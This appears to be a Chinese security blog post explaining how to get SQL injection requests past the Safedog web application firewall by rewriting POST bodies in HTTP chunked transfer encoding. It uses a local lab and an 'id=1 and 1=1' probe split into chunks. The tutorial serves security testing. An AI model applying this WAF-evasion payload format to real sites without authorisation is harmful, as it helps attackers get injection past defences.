<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="最近有小伙伴给我发了篇文章，和分块传输(Chunked Transfer Coding)，然后就去FREEBUF上面看了下相关的文章，又是另外一种bypass的方式啦利用分块传输吊打所有WAF">
<meta property="og:type" content="article">
<meta property="og:title" content="分块传输sql语句过waf">
<meta property="og:url" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/index.html">
<meta property="og:site_name" content="Sriracha :)">
<meta property="og:description" content="最近有小伙伴给我发了篇文章，和分块传输(Chunked Transfer Coding)，然后就去FREEBUF上面看了下相关的文章，又是另外一种bypass的方式啦利用分块传输吊打所有WAF">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/使用方式.png">
<meta property="og:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/safedog.png">
<meta property="og:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/1.png">
<meta property="og:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/2.png">
<meta property="og:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/3.png">
<meta property="og:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/success.png">
<meta property="og:updated_time" content="2019-07-23T03:22:56.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="分块传输sql语句过waf">
<meta name="twitter:description" content="最近有小伙伴给我发了篇文章，和分块传输(Chunked Transfer Coding)，然后就去FREEBUF上面看了下相关的文章，又是另外一种bypass的方式啦利用分块传输吊打所有WAF">
<meta name="twitter:image" content="http://yoursite.com/2019/07/04/分块传输sql语句过waf/使用方式.png">



  <link rel="alternate" href="/atom.xml" title="Sriracha :)" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2019/07/04/分块传输sql语句过waf/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>分块传输sql语句过waf | Sriracha :)</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sriracha :)</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">Wow, the smell is great!</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-pentest">

    
    
    
      
    

    

    <a href="/Pentest" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>渗透测试</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-audit">

    
    
    
      
    

    

    <a href="/Audit" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>代码审计</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-python">

    
    
    
      
    

    

    <a href="/Python" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Python</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about_me">

    
    
    
      
    

    

    <a href="/About_Me" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>关于我</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-weapon">

    
    
    
      
    

    

    <a href="/weapon" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Weapon</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/04/分块传输sql语句过waf/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sher10ck">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sriracha :)">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">分块传输sql语句过waf

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-07-04 09:55:48" itemprop="dateCreated datePublished" datetime="2019-07-04T09:55:48+08:00">2019-07-04</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-07-23 11:22:56" itemprop="dateModified" datetime="2019-07-23T11:22:56+08:00">2019-07-23</time>
              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近有小伙伴给我发了篇文章，和分块传输(Chunked Transfer Coding)，然后就去FREEBUF上面看了下相关的文章，又是另外一种bypass的方式啦<br><a href="https://www.freebuf.com/articles/web/194351.html" target="_blank" rel="noopener">利用分块传输吊打所有WAF</a></p>
<a id="more"></a>
<h1 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h1><p>Chunked coding converter<br><a href="https://github.com/c0ny1/chunked-coding-converter" target="_blank" rel="noopener">https://github.com/c0ny1/chunked-coding-converter</a></p>
<p>不过github上的需要编译一下，嫌麻烦的小伙伴可以下载别人已经编译好的jar包<br>下载链接: <a href="https://pan.baidu.com/s/1N-N7h4kL5Kick43bKEhytQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1N-N7h4kL5Kick43bKEhytQ</a> 提取码: hn8p</p>
<h1 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h1><p><img src="/2019/07/04/分块传输sql语句过waf/使用方式.png" alt="使用方法"></p>
<p>添加好之后，我们要部署好注入环境，这里搭建好了safedog + phpstudy，我们这里采用的提交参数的方式为POST，然后安全狗的漏洞防护那里要设置为检测POST内容，默认是不检测的<br><img src="/2019/07/04/分块传输sql语句过waf/safedog.png" alt="使用方法"></p>
<p>我们搭建好之后抓包，放到repeater里面，利用方式如下：<br><img src="/2019/07/04/分块传输sql语句过waf/1.png" alt="使用方法"><br><img src="/2019/07/04/分块传输sql语句过waf/2.png" alt="使用方法"><br><img src="/2019/07/04/分块传输sql语句过waf/3.png" alt="使用方法"></p>
<p>这样我们就能绕过waf了</p>
<h1 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h1><p>freebuf上面的那篇文章把分块传输的定义规范，不过我看了半天的英文觉得有点绕，这里就贴一下分块传输的格式：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">chunked-body   = *chunk</span><br><span class="line">                 last-chunk</span><br><span class="line">                 trailer-part</span><br><span class="line">                 CRLF</span><br><span class="line"></span><br><span class="line">chunk          = chunk-size [ chunk-ext ] CRLF</span><br><span class="line">                 chunk-data CRLF</span><br><span class="line">chunk-size     = 1*HEXDIG</span><br><span class="line">last-chunk     = 1*(&quot;0&quot;) [ chunk-ext ] CRLF</span><br><span class="line"></span><br><span class="line">chunk-data     = 1*OCTET ; a sequence of chunk-size octets</span><br></pre></td></tr></table></figure></p>
<p>大概解释一下，chunked-body由chunk、last-chunk、trailer-part、CRLF四个部分组成<br>chunk由chunk-size和chunk-data两部分组成<br>tailer-part不知道是什么<br>CRLF可以理解成换行符</p>
<p>然后chunk还有一个扩展，就是能用 ; 作为注释符：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">chunk-ext      = *( &quot;;&quot; chunk-ext-name [ &quot;=&quot; chunk-ext-val ] )</span><br><span class="line"></span><br><span class="line">chunk-ext-name = token</span><br><span class="line">chunk-ext-val  = token / quoted-string</span><br></pre></td></tr></table></figure></p>
<p>有可能你觉得我上面的话是废话，我们接下来实际操作一遍。</p>
<p>首先我提交的post参数为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1</span><br></pre></td></tr></table></figure></p>
<p>我们用上面的工具加密之后：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">2;fIT1nmMBJZYWNS5LjMvip</span><br><span class="line">id</span><br><span class="line">2;zJA4ef2iJgoNIrqsIS1swHm</span><br><span class="line">=1</span><br><span class="line">2;UJP7LknwUaNVbr</span><br><span class="line"> a</span><br><span class="line">3;estmrm0DAX9FV15nKxu</span><br><span class="line">nd </span><br><span class="line">1;XHodZjjSKDY</span><br><span class="line">1</span><br><span class="line">2;97eXEkVqACpxzn0sYnb8rPeuS</span><br><span class="line">=1</span><br><span class="line">0</span><br></pre></td></tr></table></figure></p>
<p>我们把这一部分分成几块来看：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#长度;注释的内容(这块是啥都行)</span><br><span class="line">2;fIT1nmMBJZYWNS5LjMvip</span><br><span class="line">#我们原先提交的参数，取了长度为2的内容出来</span><br><span class="line">id</span><br></pre></td></tr></table></figure></p>
<p>接下来都是的：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">2;zJA4ef2iJgoNIrqsIS1swHm</span><br><span class="line">=1</span><br><span class="line">2;UJP7LknwUaNVbr</span><br><span class="line"> a</span><br><span class="line">3;estmrm0DAX9FV15nKxu</span><br><span class="line">nd </span><br><span class="line">1;XHodZjjSKDY</span><br><span class="line">1</span><br><span class="line">2;97eXEkVqACpxzn0sYnb8rPeuS</span><br><span class="line">=1</span><br></pre></td></tr></table></figure></p>
<p>然后就是：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0</span><br></pre></td></tr></table></figure></p>
<p><strong>注意这个0之后还有两个回车。这里好像显示不出来</strong></p>
<p>这样就能bypass了。</p>
<p>要是还是不能理解，你就把分块传输当做一个规定，我们提交的参数可以按照这个规定写就好了。</p>
<p>然后我们就可以自己构造payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">i</span><br><span class="line">2</span><br><span class="line">d=</span><br><span class="line">1</span><br><span class="line">1</span><br><span class="line">3</span><br><span class="line"> an</span><br><span class="line">1</span><br><span class="line">d</span><br><span class="line">3</span><br><span class="line"> 1=</span><br><span class="line">1</span><br><span class="line">1</span><br><span class="line">0</span><br><span class="line">\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure></p>
<p>注意一下后面有两个回车，这里我用\r\n来表示<br>还要注意添加了一个头信息：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Transfer-Encoding: chunked</span><br></pre></td></tr></table></figure></p>
<p>bypass成功<br><img src="/2019/07/04/分块传输sql语句过waf/success.png" alt="使用方法"></p>
<p>当然，也可以添加注释来绕过，我这里没写，你要是看懂了的话就知道我再说什么了。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/01/一次sql注入bypass的思考/" rel="next" title="一次sql注入bypass的思考">
                <i class="fa fa-chevron-left"></i> 一次sql注入bypass的思考
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/05/YxtCMF代码审计/" rel="prev" title="YxtCMF后台的注入和getshell分析">
                YxtCMF后台的注入和getshell分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">sher10ck</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">43</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wulidecade.cn" title="https://wulidecade.cn" rel="noopener" target="_blank">Decade</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mang0.me/" title="http://mang0.me/" rel="noopener" target="_blank">Mang0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.singll.cc/" title="https://blog.singll.cc/" rel="noopener" target="_blank">Singll</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io/" title="https://timeshu.github.io/" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hit0on.github.io/" title="https://hit0on.github.io/" rel="noopener" target="_blank">HitOn</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#工具"><span class="nav-number">1.</span> <span class="nav-text">工具</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#使用方法"><span class="nav-number">2.</span> <span class="nav-text">使用方法</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#原理"><span class="nav-number">3.</span> <span class="nav-text">原理</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sher10ck</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v6.7.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  

  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  
  





  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
